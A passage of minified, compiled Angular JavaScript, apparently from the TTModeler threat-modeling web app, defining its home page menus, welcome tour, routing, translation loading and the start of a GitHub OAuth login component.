"),m(108,"input",28,29),he("change",function(n){return be(e),Me(B().dataService.ImportFile(n))}),u(),s(110,"\n                  "),m(111,"button",30),he("click",function(){return be(e),Me(Ti(109).click())}),oe(112,"translate"),s(113,"\n                    "),m(114,"mat-icon"),s(115,"file_upload"),u(),s(116,"\n                    "),m(117,"span"),s(118),oe(119,"translate"),u(),s(120,"\n                  "),u(),s(121,"\n                "),u(),s(122,"\n              "),u(),s(123,"\n\n              "),ne(124,lct,5,4,"div",31),s(125,"\n\n              "),ne(126,dct,6,3,"button",32),s(127,"\n              "),ne(128,mct,6,4,"button",33),s(129,"\n              "),m(130,"mat-menu",null,34),s(132,"\n                "),m(133,"button",26),he("click",function(){return be(e),Me(B().dataService.OnNewProject())}),s(134,"\n                  "),m(135,"mat-icon"),s(136,"book_2"),u(),s(137,"\n                  "),m(138,"span"),s(139),oe(140,"translate"),u(),s(141,"\n                "),u(),s(142,"\n                "),ne(143,uct,8,2,"button",27),s(144,"\n              "),u(),s(145,"\n              "),it(146,"br"),s(147,"\n              "),ne(148,fct,48,17,"ng-container",35),s(149,"\n              "),ne(150,pct,2,3,"mat-paginator",36),s(151,"\n              \n              "),ne(152,_ct,46,16,"ng-container",35),s(153,"\n              "),ne(154,gct,2,3,"mat-paginator",36),s(155,"\n\n              "),m(156,"h2"),s(157),oe(158,"translate"),m(159,"button",18),s(160,"\n                  "),m(161,"mat-icon"),s(162,"more_vert"),u(),s(163,"\n                "),u(),s(164,"\n                "),m(165,"mat-menu",null,37),s(167,"\n                  "),m(168,"input",38,39),he("change",function(n){return be(e),Me(B().dataService.ImportFile(n))}),u(),s(170,"\n                  "),m(171,"button",26),he("click",function(){return be(e),Me(Ti(169).click())}),s(172,"\n                    "),m(173,"mat-icon"),s(174,"file_upload"),u(),s(175,"\n                    "),m(176,"span"),s(177),oe(178,"translate"),u(),s(179,"\n                  "),u(),s(180,"\n                "),u(),s(181,"\n              "),u(),s(182,"\n\n              "),ne(183,yct,48,16,"ng-container",35),s(184,"\n              "),ne(185,bct,2,3,"mat-paginator",36),s(186,"\n\n              "),ne(187,Mct,46,16,"ng-container",35),s(188,"\n              "),ne(189,vct,2,3,"mat-paginator",36),s(190,"\n\n              "),m(191,"div",40),s(192,"\n                "),m(193,"mat-icon",41),s(194,"waving_hand"),u(),s(195,"\n                "),m(196,"button",42),he("click",function(){return be(e),Me(B().tourService.start())}),s(197),oe(198,"translate"),u(),s(199,"\n                "),ne(200,Act,11,3,"ng-container",11),s(201,"\n                "),it(202,"br"),s(203,"\n                "),m(204,"mat-icon",43),s(205,"code"),u(),s(206,"\n                "),m(207,"a",44),s(208),oe(209,"translate"),u(),s(210,"\n              "),u(),s(211,"\n            "),Mt()}if(2&t){const e=Ti(12),i=Ti(69),n=Ti(166),r=B();C(3),ct("\n                ",re(4,47,"pages.home.projects"),"\n                "),C(2),V("matMenuTriggerFor",e),C(9),V("disabled",!r.dataService.CanSaveProject),C(6),ke(re(21,49,"pages.home.menu.saveProject")),C(4),at("matTooltip",re(25,51,"pages.home.menu.downloadProject.tt")),V("disabled",!r.dataService.Project),C(7),ke(re(32,53,"pages.home.menu.downloadProject")),C(4),at("matTooltip",re(36,55,"pages.home.menu.downloadConfig.tt")),V("disabled",!r.dataService.Project),C(7),ke(re(43,57,"pages.home.menu.downloadConfig")),C(4),at("matTooltip",re(47,59,"pages.home.menu.exportConfig.tt")),V("disabled",!r.dataService.Project||!r.dataService.IsLoggedIn),C(7),ke(re(54,61,"pages.home.menu.exportConfig")),C(4),at("matTooltip",re(58,63,"pages.home.menu.exchangeConfig.tt")),V("disabled",!r.dataService.Project)("matMenuTriggerFor",i),C(7),ke(re(65,65,"pages.home.menu.exchangeConfig")),C(7),V("disabled",!0),C(4),ct("\n                      ",re(76,67,"pages.home.menu.importConfig"),"\n                    "),C(4),ke(re(80,69,"general.DefaultConfiguration")),C(3),V("ngForOf",r.dataService.AvailableGHConfigs),C(3),at("matTooltip",re(86,71,"pages.home.menu.transferProjectDetails.tt")),V("disabled",!r.dataService.HasProject),C(7),ke(re(93,73,"pages.home.menu.transferProjectDetails")),C(4),V("disabled",!r.dataService.Project),C(6),ke(re(103,75,"pages.home.menu.closeProject")),C(9),at("matTooltip",re(112,77,"pages.home.menu.importProject.tt")),C(7),ke(re(119,79,"pages.home.menu.importProject")),C(6),V("ngIf",r.dataService.HasProject),C(2),V("ngIf",0==r.dataService.AvailableConfigs.length),C(2),V("ngIf",r.dataService.AvailableConfigs.length>0),C(11),ke(re(140,81,"general.DefaultConfiguration")),C(4),V("ngForOf",r.dataService.AvailableConfigs),C(5),V("ngForOf",r.GetAvailableGHProjects()),C(2),V("ngIf",r.dataService.AvailableGHProjects.length>0),C(2),V("ngForOf",r.GetAvailableFSProjects()),C(2),V("ngIf",r.dataService.AvailableFSProjects.length>0),C(3),ct("\n                ",re(158,83,"pages.home.configs"),"\n                "),C(2),V("matMenuTriggerFor",n),C(18),ke(re(178,85,"pages.home.menu.importConfig")),C(6),V("ngForOf",r.GetAvailableGHConfigs()),C(2),V("ngIf",r.dataService.AvailableGHConfigs.length>0),C(2),V("ngForOf",r.GetAvailableFSConfigs()),C(2),V("ngIf",r.dataService.AvailableFSConfigs.length>0),C(8),ke(re(198,87,"pages.home.welcomeTour")),C(3),V("ngIf",!(null!=r.electron&&r.electron.isElectron)),C(8),ke(re(209,89,"pages.home.viewSourceCode"))}}function Ect(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"h2"),s(3),oe(4,"translate"),u(),s(5,"\n              "),m(6,"p"),s(7),oe(8,"translate"),u(),s(9,"\n              "),m(10,"button",64),s(11),oe(12,"translate"),u(),s(13,"\n              "),m(14,"button",65),he("click",function(){be(e);const n=B();return n.dataService.GuestLogin(),Me(n.CheckTourStart())}),s(15),oe(16,"translate"),u(),s(17,"\n            "),Mt()}2&t&&(C(3),ct("",re(4,4,"pages.home.welcome"),"!"),C(4),ct("",re(8,6,"pages.home.need_login"),":"),C(4),ke(re(12,8,"pages.home.go_to_login")),C(4),ke(re(16,10,"pages.login.loginAsGuest")))}function Dct(t,a){1&t&&(bt(0),s(1,"\n              "),m(2,"div",45),s(3),oe(4,"translate"),m(5,"a",66),s(6,"YouTube"),u(),s(7,"\n                "),it(8,"br"),s(9,"\n              "),u(),s(10,"\n            "),Mt()),2&t&&(C(3),ct("\n                ",re(4,1,"pages.home.video"),": "))}function xct(t,a){if(1&t&&(bt(0),s(1,"\n              "),m(2,"div",67),s(3,"\n                "),it(4,"iframe",68),s(5,"\n              "),u(),s(6,"\n            "),Mt()),2&t){const e=B();C(4),V("src",e.VideoURL,PC)}}function wct(t,a){if(1&t&&(m(0,"p",69)(1,"mat-icon",70),s(2,"done"),u(),s(3),oe(4,"translate"),u()),2&t){const e=a.$implicit;C(3),ct(" ",re(4,1,"pages.home.tool."+e),"")}}function Ict(t,a){if(1&t&&(m(0,"p"),s(1),u()),2&t){const e=a.$implicit;C(1),za("",e.number,". ",e.name,"")}}function Rct(t,a){if(1&t){const e=Ye();m(0,"button",16),he("click",function(){return be(e),Me(B(2).NextProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(C(1),ke(re(2,1,"tour.next")))}function Sct(t,a){if(1&t){const e=Ye();m(0,"button",16),he("click",function(){return be(e),Me(B(2).ProgressTracker())}),s(1),oe(2,"translate"),u()}2&t&&(C(1),ke(re(2,1,"tour.progressTracker")))}function kct(t,a){if(1&t){const e=Ye();m(0,"button",16),he("click",function(){return be(e),Me(B(2).NextProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(C(1),ke(re(2,1,"tour.end")))}function Pct(t,a){if(1&t){const e=Ye();m(0,"mat-expansion-panel",14),he("opened",function(){const r=be(e).index;return Me(B().SetProcessStep(r+2))}),s(1,"\n                "),m(2,"mat-expansion-panel-header"),s(3,"\n                  "),m(4,"mat-panel-title"),s(5),u(),s(6,"\n                  "),m(7,"mat-panel-description"),s(8),m(9,"mat-icon"),s(10),u(),s(11,"\n                  "),u(),s(12,"\n                "),u(),s(13,"\n\n                "),ne(14,Ict,2,2,"p",35),s(15,"\n                "),m(16,"mat-action-row"),s(17,"\n                  "),m(18,"button",16),he("click",function(){return be(e),Me(B().PrevProcessStep())}),s(19),oe(20,"translate"),u(),s(21,"\n                  "),ne(22,Rct,3,3,"button",71),s(23,"\n                  "),ne(24,Sct,3,3,"button",71),s(25,"\n                  "),ne(26,kct,3,3,"button",71),s(27,"\n                "),u(),s(28,"\n              "),u()}if(2&t){const e=a.$implicit,i=a.index,n=a.last,r=B();ri("margin-bottom",n?"20px":"0px"),V("expanded",r.processStep===i+2),C(5),ct("\n                    ",e.name,"\n                  "),C(3),ct("\n                    ",e.desc,"\n                    "),C(2),ke(e.icon),C(4),V("ngForOf",e.steps),C(5),ke(re(20,11,"tour.prev")),C(3),V("ngIf",!n),C(2),V("ngIf",n),C(2),V("ngIf",n)}}const Oct=[{path:"home",component:(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){this.router=e,this.route=i,this.theme=n,this.dataService=r,this.dialogService=c,this.dialog=d,this.locStorage=T,this.tourService=k,this.translate=q,this.electron=Y,this.ttmService=te,this.sanitizer=pe,this.processStep=null,this.VideoURL=null,this.pageProjectSize=5,this.pageConfigSize=5,this.pageGHProjectIndex=0,this.pageGHConfigIndex=0,this.pageFSProjectIndex=0,this.pageFSConfigIndex=0,this.toolBenefits=["platform","onlineStorage","offlineStorage","libraries","libraryIntegration","guidelines","diagramming","riskAssessment","dashboard","reports","export","languages","collaboration"],this.VideoURL=this.sanitizer.bypassSecurityTrustResourceUrl("https://www.youtube-nocookie.com/embed/videoseries?list=PLSMRtuVN409fB35RLljjg3jNkVJbLIP1u")}get Stages(){return this.ttmService.Stages}get HasCookieConsent(){let e=this.locStorage.Get(si.COOKIE_CONSENT);return null!=e&&JSON.parse(e)}ngOnInit(){const e=n=>({anchorId:n,content:this.translate.instant("tour."+n+".content"),title:this.translate.instant("tour."+n+".title"),route:"",enableBackdrop:!0,prevBtnTitle:this.translate.instant("tour.prev"),nextBtnTitle:this.translate.instant("tour.next"),endBtnTitle:this.translate.instant("tour.end")});this.translate.get("tour.change-settings.title").subscribe(()=>{const n=()=>{this.tourService.initialize([e("change-settings"),e("message-history"),e("save-file"),e("set-progress")]),null==this.locStorage.Get(si.COOKIE_CONSENT)?this.dialogService.OpenCookieConsentDialog().subscribe(d=>this.CheckTourStart()):this.CheckTourStart()},r=this.locStorage.Get(si.LANGUAGE);r&&0!=r.length?n():this.dialog.open(sct).afterClosed().subscribe(c=>{n()})});let i="modeling";this.route.queryParams.subscribe(n=>{null!=n.origin&&(i=n.origin)}),this.dataService.ProjectChanged.subscribe(n=>{null!=n&&this.router.navigate(["/"+i])})}CheckTourStart(){[Wr.LoggedIn,Wr.Guest].includes(this.dataService.UserMode)&&(this.locStorage.Get(si.WELCOME_TOUR_STARTED)||(this.tourService.start(),this.locStorage.Set(si.WELCOME_TOUR_STARTED,JSON.stringify(!0))))}GetRepoName(e){var i;return null===(i=this.dataService.GetRepoOfFile(e))||void 0===i?void 0:i.name}IsProtected(e){var i;return!(null!==(i=this.dataService.GetRepoOfFile(e))&&void 0!==i&&i.isWritable)}GetAvailableGHProjects(){return this.dataService.AvailableGHProjects.slice(this.pageGHProjectIndex*this.pageProjectSize,(this.pageGHProjectIndex+1)*this.pageProjectSize)}GetAvailableGHConfigs(){return this.dataService.AvailableGHConfigs.slice(this.pageGHConfigIndex*this.pageConfigSize,(this.pageGHConfigIndex+1)*this.pageConfigSize)}GetAvailableFSProjects(){return this.dataService.AvailableFSProjects.slice(this.pageFSProjectIndex*this.pageProjectSize,(this.pageFSProjectIndex+1)*this.pageProjectSize)}GetAvailableFSConfigs(){return this.dataService.AvailableFSConfigs.slice(this.pageFSConfigIndex*this.pageConfigSize,(this.pageFSConfigIndex+1)*this.pageConfigSize)}SetProcessStep(e){this.processStep=e}NextProcessStep(){this.processStep++}PrevProcessStep(){this.processStep--}ProgressTracker(){this.NextProcessStep(),this.dialogService.OpenProgresstrackerDialog()}GetFileIcon(e){return e.source==hn.FileSystem?"file_present":"cloud_queue"}CutName(e){return e&&e.length>35?"[...]"+e.substring(e.length-30):e}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oo),Ee(El),Ee(Oa),Ee(Yi),Ee(Wn),Ee(vu),Ee(_r),Ee(Gb),Ee(Sn),Ee(ST),Ee(x5),Ee(cy))},t.\u0275cmp=Wt({type:t,selectors:[["app-home"]],decls:127,vars:41,consts:[["color","primary",1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/home",2,"width","100%","height","100%"],[1,"title"],["src","./assets/icons/favicon.192x192.png?raw=true","alt","logo",2,"width","50px"],["color","warn",1,"iconBtn",2,"vertical-align","top","font-size","20px","margin-right","5px","margin-bottom","10px"],["href","https://emgarde.de","target","_blank"],[1,"row"],[1,"column"],[1,"first-column-content"],[4,"ngIf"],[1,"second-column-content"],[1,"expansion-panel-headers-align"],["hideToggle","",3,"expanded","opened"],["style","margin: 0;",4,"ngFor","ngForOf"],["mat-button","","color","primary",3,"click"],["hideToggle","",3,"marginBottom","expanded","opened",4,"ngFor","ngForOf"],["mat-icon-button","","aria-label","Menu",2,"vertical-align","middle",3,"matMenuTriggerFor"],["projMenu","matMenu"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","","matTooltipShowDelay","1000",3,"disabled","matTooltip","click"],["mat-menu-item","","matTooltipShowDelay","1000",1,"exportBtn",3,"disabled","matTooltip","click"],["mat-menu-item","","matTooltipShowDelay","1000",1,"exportBtn",3,"disabled","matMenuTriggerFor","matTooltip"],["exchangeMenu","matMenu"],["mat-menu-item","",3,"disabled"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["hidden","","type","file","accept",".ttmp",3,"change"],["projectUploader",""],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"],["style","margin-bottom: 10px;",4,"ngIf"],["mat-button","","style","padding-left: 0px; margin-bottom: 20px;",3,"click",4,"ngIf"],["mat-button","","style","padding-left: 0px; margin-bottom: 20px;",3,"matMenuTriggerFor",4,"ngIf"],["createProjectWithConfig","matMenu"],[4,"ngFor","ngForOf"],["class","paginator",3,"length","pageSize","hidePageSize","page",4,"ngIf"],["confMenu","matMenu"],["hidden","","type","file","accept",".ttmc",3,"change"],["configUploader",""],[2,"margin-top","50px"],[1,"iconBtn",2,"vertical-align","top","font-size","20px","margin-right","5px"],[1,"color-primary","astext",3,"click"],[1,"iconBtn",2,"vertical-align","top","font-size","20px","margin-right","5px","margin-bottom","10px"],["href","https://github.com/SecSimon/TTM","target","_blank"],[2,"margin-bottom","10px"],["mat-button","",2,"padding-left","0px","margin-bottom","20px",3,"click"],["color","primary"],["mat-button","",2,"padding-left","0px","margin-bottom","20px",3,"matMenuTriggerFor"],["id","project"],["matTooltipShowDelay","1000",1,"iconBtn",2,"vertical-align","top","font-size","20px","margin-right","5px",3,"matTooltip"],["matTooltipShowDelay","1000",2,"font-size","small","margin-left","5px",3,"matTooltip"],["class","iconBtn","style","vertical-align: top; margin-right: 5px;","matTooltipShowDelay","1000",3,"matTooltip",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",1,"show-on-hover","iconBtn",2,"margin-right","5px",3,"matMenuTriggerFor","matTooltip"],["moreGHProject","matMenu"],["matTooltipShowDelay","1000",1,"iconBtn",2,"vertical-align","top","margin-right","5px",3,"matTooltip"],[1,"paginator",3,"length","pageSize","hidePageSize","page"],["moreFSProject","matMenu"],["id","config"],[2,"font-size","small","margin-left","5px"],["moreGHConfig","matMenu"],["moreFSConfig","matMenu"],[1,"iconBtn",2,"vertical-align","top","font-size","20px","margin-right","5px","margin-bottom","5px"],["href","https://github.com/SecSimon/TTM/releases","target","_blank"],["mat-button","","routerLink","/login"],["mat-button","",3,"click"],["href","https://youtube.com/playlist?list=PLSMRtuVN409fB35RLljjg3jNkVJbLIP1u","target","_blank"],[1,"videoContainer"],["title","Thing Threat Modeling","frameborder","0","allow","accelerometer; encrypted-media; gyroscope; picture-in-picture","allowfullscreen","",1,"video",3,"src"],[2,"margin","0"],[2,"vertical-align","bottom"],["mat-button","","color","primary",3,"click",4,"ngIf"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),it(6,"app-side-nav",3),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),m(11,"div",4),s(12,"\n        "),m(13,"h1"),it(14,"img",5),s(15),oe(16,"translate"),u(),s(17,"\n        "),m(18,"h3"),s(19),oe(20,"translate"),u(),s(21,"\n        "),m(22,"p"),s(23,"\n          "),m(24,"mat-icon",6),s(25,"announcement"),u(),s(26),oe(27,"translate"),m(28,"a",7),s(29,"TTModeler Pro"),u(),s(30,"\n        "),u(),s(31,"\n      "),u(),s(32,"\n      "),m(33,"div",8),s(34,"\n        "),m(35,"div",9),s(36,"\n          "),m(37,"div",10),s(38,"\n            "),ne(39,Tct,212,91,"ng-container",11),s(40,"\n\n            "),ne(41,Ect,18,12,"ng-container",11),s(42,"\n          "),u(),s(43,"\n        "),u(),s(44,"\n        "),m(45,"div",9),s(46,"\n          "),m(47,"div",12),s(48,"\n            "),m(49,"h2"),s(50),oe(51,"translate"),u(),s(52,"\n            "),ne(53,Dct,11,3,"ng-container",11),s(54,"\n            "),ne(55,xct,7,1,"ng-container",11),s(56,"\n            "),m(57,"mat-accordion",13),s(58,"\n              "),m(59,"mat-expansion-panel",14),he("opened",function(){return i.SetProcessStep(0)}),s(60,"\n                "),m(61,"mat-expansion-panel-header"),s(62,"\n                  "),m(63,"mat-panel-title"),s(64,"\n                    TTModeler\n                  "),u(),s(65,"\n                  "),m(66,"mat-panel-description"),s(67),oe(68,"translate"),m(69,"mat-icon"),s(70,"terminal"),u(),s(71,"\n                  "),u(),s(72,"\n                "),u(),s(73,"\n\n                "),ne(74,wct,5,3,"p",15),s(75,"\n                "),m(76,"mat-action-row"),s(77,"\n                  "),m(78,"button",16),he("click",function(){return i.NextProcessStep()}),s(79),oe(80,"translate"),u(),s(81,"\n                "),u(),s(82,"\n              "),u(),s(83,"\n              "),m(84,"mat-expansion-panel",14),he("opened",function(){return i.SetProcessStep(1)}),s(85,"\n                "),m(86,"mat-expansion-panel-header"),s(87,"\n                  "),m(88,"mat-panel-title"),s(89),oe(90,"translate"),u(),s(91,"\n                  "),m(92,"mat-panel-description"),s(93),oe(94,"translate"),m(95,"mat-icon"),s(96,"star"),u(),s(97,"\n                  "),u(),s(98,"\n                "),u(),s(99,"\n\n                "),m(100,"p"),s(101),oe(102,"translate"),u(),s(103,"\n                "),m(104,"mat-action-row"),s(105,"\n                  "),m(106,"button",16),he("click",function(){return i.PrevProcessStep()}),s(107),oe(108,"translate"),u(),s(109,"\n                  "),m(110,"button",16),he("click",function(){return i.NextProcessStep()}),s(111),oe(112,"translate"),u(),s(113,"\n                "),u(),s(114,"\n              "),u(),s(115,"\n              "),ne(116,Pct,29,13,"mat-expansion-panel",17),s(117,"\n            "),u(),s(118,"\n          "),u(),s(119,"\n        "),u(),s(120,"\n      "),u(),s(121,"\n    "),u(),s(122,"\n  "),u(),s(123,"\n  "),it(124,"app-status-bar"),s(125,"\n"),u(),s(126,"\n")),2&e&&(C(15),ct(" ",re(16,19,"pages.home.title"),""),C(4),ke(re(20,21,"pages.home.subtitle")),C(7),ct("\n          ",re(27,23,"pages.home.TTModelerPro")," "),C(13),V("ngIf",i.dataService.IsLoggedIn||i.dataService.IsGuest),C(2),V("ngIf",!i.dataService.IsLoggedIn&&!i.dataService.IsGuest),C(9),ke(re(51,25,"pages.home.process")),C(3),V("ngIf",!i.HasCookieConsent),C(2),V("ngIf",i.HasCookieConsent),C(4),V("expanded",0===i.processStep),C(8),ct("\n                    ",re(68,27,"pages.home.tool"),"\n                    "),C(7),V("ngForOf",i.toolBenefits),C(5),ke(re(80,29,"tour.next")),C(5),V("expanded",1===i.processStep),C(5),ct("\n                    ",re(90,31,"pages.home.process"),"\n                  "),C(4),ct("\n                    ",re(94,33,"pages.home.methodology"),"\n                    "),C(8),ke(re(102,35,"pages.home.methodologyInfo")),C(6),ke(re(108,37,"tour.prev")),C(4),ke(re(112,39,"tour.next")),C(5),V("ngForOf",i.Stages))},dependencies:[Zi,Ri,oa,_u,gu,Od,da,_p,Xo,qo,po,Pa,tl,Ec,E8,Dc,el,Il,x8,_f,gf,x1,Xi],styles:['.primary-color[_ngcontent-%COMP%], a[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.title[_ngcontent-%COMP%]{margin-top:5%;margin-left:12.5%}.column[_ngcontent-%COMP%]{float:left;width:50%}.first-column-content[_ngcontent-%COMP%]{padding-top:30px;margin-left:25%}.second-column-content[_ngcontent-%COMP%]{padding-top:30px;margin-right:25%}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.astext[_ngcontent-%COMP%]{background:none;border:none;margin:0 0 5px;padding:0;cursor:pointer;font-size:large}.iconBtn[_ngcontent-%COMP%]{width:20px;height:20px;line-height:20px}.exportBtn[_ngcontent-%COMP%]     .mat-badge-content{right:-1px!important}.importBtn[_ngcontent-%COMP%]     .mat-badge-content{right:-1px!important}#project[_ngcontent-%COMP%]   .show-on-hover[_ngcontent-%COMP%]{visibility:hidden}#project[_ngcontent-%COMP%]:hover   .show-on-hover[_ngcontent-%COMP%]{visibility:visible}.paginator[_ngcontent-%COMP%]{background:transparent}.paginator[_ngcontent-%COMP%]     .mat-paginator-container{justify-content:left;min-height:auto;padding:0}.paginator[_ngcontent-%COMP%]     .mat-paginator-range-label{margin:0 24px 0 0}#config[_ngcontent-%COMP%]   .show-on-hover[_ngcontent-%COMP%]{visibility:hidden}#config[_ngcontent-%COMP%]:hover   .show-on-hover[_ngcontent-%COMP%]{visibility:visible}.videoContainer[_ngcontent-%COMP%]{position:relative;width:100%;max-width:600px;padding-top:56.25%;margin-bottom:20px}.video[_ngcontent-%COMP%]{position:absolute;inset:0;width:100%;height:100%}.expansion-panel-headers-align[_ngcontent-%COMP%]   mat-expansion-panel[_ngcontent-%COMP%]{max-width:600px}']}),t})()}];let vZ=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,bs.forChild(Oct),bs]}),t})();const Nct=[{path:"",redirectTo:"home",pathMatch:"full"},{path:"**",component:rct}];let Lct=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[bs.forRoot(Nct,{relativeLinkResolution:"legacy"}),vZ,bs]}),t})();class zct{constructor(a,e="/assets/i18n/",i=".json"){this.http=a,this.prefix=e,this.suffix=i}getTranslation(a){return this.http.get(`${this.prefix}${a}${this.suffix}`)}}let Wct=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,pf,vZ]}),t})();function Fct(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ke(re(1,1,"pages.login.step1.title"))}function Vct(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ke(re(1,1,"pages.login.step2.title"))}function Bct(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ke(re(1,1,"pages.login.step3.title"))}function Hct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n            "),m(2,"h1",15),he("click",function(){return be(e),Me(B().onGithubLogin())}),s(3),oe(4,"translate"),m(5,"mat-icon"),s(6,"open_in_new"),u()(),s(7,"\n            "),m(8,"mat-checkbox",16),he("ngModelChange",function(n){return be(e),Me(B().dataService.KeepUserSignedIn=n)}),s(9),oe(10,"translate"),u(),s(11,"\n            "),m(12,"h3",17),he("click",function(){return be(e),Me(B().dataService.GuestLogin())}),s(13),oe(14,"translate"),u(),s(15,"\n          "),Mt()}if(2&t){const e=B();C(2),Ct("login-hover-light",!e.theme.IsDarkMode)("login-hover-dark",e.theme.IsDarkMode),C(1),ct("",re(4,12,"pages.login.loginViaGithub")," "),C(5),V("ngModel",e.dataService.KeepUserSignedIn),C(1),ke(re(10,14,"pages.login.keep_signed_in")),C(3),Ct("login-hover-light",!e.theme.IsDarkMode)("login-hover-dark",e.theme.IsDarkMode),C(1),ke(re(14,16,"pages.login.loginAsGuest"))}}function Uct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n            "),m(2,"h1"),s(3),oe(4,"translate"),u(),s(5,"\n\n            "),m(6,"button",9),he("click",function(){return be(e),Me(B().dataService.LogOut())}),s(7,"\n              Logout\n            "),u(),s(8,"\n          "),Mt()}if(2&t){const e=B();C(3),za("",re(4,2,"pages.login.welcome")," ",e.dataService.UserDisplayName,"!")}}const qct=[{path:"login",component:(()=>{class t{constructor(e,i,n,r){this.theme=e,this.route=i,this.dataService=n,this.electronService=r}ngOnInit(){this.electronService.isElectron?this.electronService.ipcRenderer.on("oncode",(e,i)=>{this.dataService.LogIn(i)}):this.route.queryParams.subscribe(e=>{null!=e.code&&this.dataService.LogIn(e.code)})}onInstallAppClick(){window.open("https://github.com/apps/thingthreatmodeler","_blank")}onForkDataClick(){window.open("https://github.com/SecSimon/TTM-data","_blank")}onGithubLogin(){this.electronService.isElectron?window.open("https://github.com/login/oauth/authorize?client_id=Iv1.6824f14edcb01831&redirect_uri=http://localhost:4200/login","_self"):window.open("https://github.com/login/oauth/authorize?client_id=Iv1.6824f14edcb01831&redirect_uri="+window.location.href.toString(),"_self")}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(El),Ee(Yi),Ee(ST))},t.\u0275cmp=Wt({type:t,selectors:[["app-login"]],decls:111,vars:37,consts:[["color","primary",1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/login",2,"width","100%","height","100%"],[1,"column","vertical-center"],[3,"innerHTML"],["orientation","vertical"],["stepper",""],["matStepLabel",""],["mat-button","",3,"click"],["mat-button","","matStepperNext",""],["mat-button","","matStepperPrevious",""],["mat-button","",3,"routerLink"],[1,"vertical-center-right"],[4,"ngIf"],[1,"login",2,"margin-bottom","10px",3,"click"],["color","primary",2,"margin-left","10px",3,"ngModel","ngModelChange"],[1,"login",2,"margin-top","25px",3,"click"]],template:function(e,i){1&e&&(s(0,"\n\n"),m(1,"div",0),s(2,"\n  "),m(3,"mat-drawer-container",1),s(4,"\n    "),m(5,"mat-drawer",2),s(6,"\n      "),it(7,"app-side-nav",3),s(8,"\n    